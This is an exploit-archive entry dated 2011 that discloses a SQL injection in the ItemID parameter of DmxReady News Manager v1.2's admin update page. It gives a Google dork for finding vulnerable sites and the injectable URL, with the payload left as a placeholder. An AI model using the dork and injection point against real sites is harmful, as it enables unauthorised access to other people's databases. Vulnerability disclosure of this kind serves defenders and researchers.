id: 16449
date: 07/03/2011
title: DmxReady News Manager v1.2 SQL Injection Vulnerability
author: Bellatrix
cves: 

# Exploit Title: DmxReady News Manager v1.2 SQL Injection Vulnerability
# Google Dork: inurl:inc_newsmanager.asp
# Date: 03.07.2011
# Author: Bellatrix
# Software Link: http://www.dmxready.com/?product=news-manager
# Version: v1.2
#Language: ASP
# Price : $99.97
# Tested on: Windows XP Sp3
# Greetz : VoLqaN , Toprak and All Cyber-Warrior TIM members....
 
-------------------------------------------------------------------------------------------------
Bug ;
 
http://target/path/admin/NewsManager/update.asp?ItemID=[SQL ATTACK]



#  0day.today [2023-03-25]  #